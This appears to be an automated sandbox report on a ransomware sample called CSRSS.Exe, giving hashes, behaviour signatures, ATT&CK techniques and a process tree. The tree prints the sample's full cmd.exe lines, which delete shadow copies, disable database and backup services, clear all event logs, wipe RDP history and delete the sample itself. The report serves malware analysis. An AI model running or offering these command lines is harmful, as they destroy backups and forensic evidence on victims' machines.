Analysis

  • max time kernel
    135s
  • max time network
    136s
  • platform
    windows7_x64
  • resource
    win7v20201028
  • submitted
    10-04-2021 11:24

General

  • Target

    CSRSS.Exe

  • Size

    210KB

  • MD5

    67438e8ddb537ef31fd86c5b046e986b

  • SHA1

    0722038e02681bb4f1312b92bd62cd070476f3d6

  • SHA256

    d7f19de8eb2461c635c0170448a58a1ec6e6de014b4410883f87d0b5d7868e65

  • SHA512

    31ba7615a173c84cd59152ed44d707ef81f37bba9d91bc9afb86d89cb6c99f4346cfdce272224f7c3e00f0b23ff930df7cc4285d63fc2185e50669ad8c5c7c39

Malware Config

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Executes dropped EXE 1 IoCs
  • Deletes itself 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • Enumerates connected drives 3 TTPs 1 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in Program Files directory 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\CSRSS.Exe
    "C:\Users\Admin\AppData\Local\Temp\CSRSS.Exe"
    1⤵
    • Adds Run key to start application
    • Enumerates connected drives
    • Drops file in Program Files directory
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1336
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c @echo off vssadmin delete shadows /all /quiet sc config browser sc config browser start=enabled sc stop vss sc config vss start=disabled sc stop MongoDB sc config MongoDB start=disabled sc stop SQLWriter sc config SQLWriter start=disabled sc stop MSSQLServerOLAPService sc config MSSQLServerOLAPService start=disabled sc stop MSSQLSERVER sc config MSSQLSERVER start=disabled sc stop MSSQL$SQLEXPRESS sc config MSSQL$SQLEXPRESS start=disabled sc stop ReportServer sc config ReportServer start=disabled sc stop OracleServiceORCL sc config OracleServiceORCL start=disabled sc stop OracleDBConsoleorcl sc config OracleDBConsoleorcl start=disabled sc stop OracleMTSRecoveryService sc config OracleMTSRecoveryService start=disabled sc stop OracleVssWriterORCL sc config OracleVssWriterORCL start=disabled sc stop MySQL sc config MySQL start=disabled
      2⤵
        PID:1356
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c @echo off vssadmin Delete Shadows /all /quiet reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil cl "%1"
        2⤵
          PID:772
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\system32\cmd.exe" /c del C:\Users\Admin\AppData\Local\Temp\CSRSS.Exe > nul
          2⤵
          • Deletes itself
          PID:1484
      • C:\Windows\explorer.exe
        "C:\Windows\explorer.exe"
        1⤵
          PID:464
        • C:\Users\Admin\Documents\HOW TO RETURN YOU FILES.exe
          "C:\Users\Admin\Documents\HOW TO RETURN YOU FILES.exe"
          1⤵
          • Executes dropped EXE
          • Suspicious use of SetWindowsHookEx
          PID:1408

        Network

        MITRE ATT&CK Matrix ATT&CK v6

        Persistence

        Modify Existing Service

        1
        T1031

        Registry Run Keys / Startup Folder

        1
        T1060

        Defense Evasion

        Modify Registry

        2
        T1112

        Disabling Security Tools

        1
        T1089

        Credential Access

        Credentials in Files

        1
        T1081

        Discovery

        Query Registry

        1
        T1012

        Peripheral Device Discovery

        1
        T1120

        System Information Discovery

        2
        T1082

        Collection

        Data from Local System

        1
        T1005

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\Documents\HOW TO RETURN YOU FILES.exe
          MD5

          4d7d39d840586dc567899770d44caabf

          SHA1

          f2f230334c756d7367b549eece537e3a6d8c731c

          SHA256

          f329578589f0a27319e3bc06d184cd4b5b48b921356370c81a9ca3c044659a67

          SHA512

          b89da499af6148ed957ab303222f39f02849603a31ef7c330b003157d12590672a17964c4386c9978cb5e7ca532cf191cc71978975efe4d2ccdcbc5b596896be

        • C:\Users\Admin\Documents\HOW TO RETURN YOU FILES.exe
          MD5

          4d7d39d840586dc567899770d44caabf

          SHA1

          f2f230334c756d7367b549eece537e3a6d8c731c

          SHA256

          f329578589f0a27319e3bc06d184cd4b5b48b921356370c81a9ca3c044659a67

          SHA512

          b89da499af6148ed957ab303222f39f02849603a31ef7c330b003157d12590672a17964c4386c9978cb5e7ca532cf191cc71978975efe4d2ccdcbc5b596896be

        • memory/464-62-0x000007FEFB6D1000-0x000007FEFB6D3000-memory.dmp
          Filesize

          8KB

        • memory/772-66-0x0000000000000000-mapping.dmp
        • memory/1336-60-0x0000000075DE1000-0x0000000075DE3000-memory.dmp
          Filesize

          8KB

        • memory/1356-61-0x0000000000000000-mapping.dmp
        • memory/1484-67-0x0000000000000000-mapping.dmp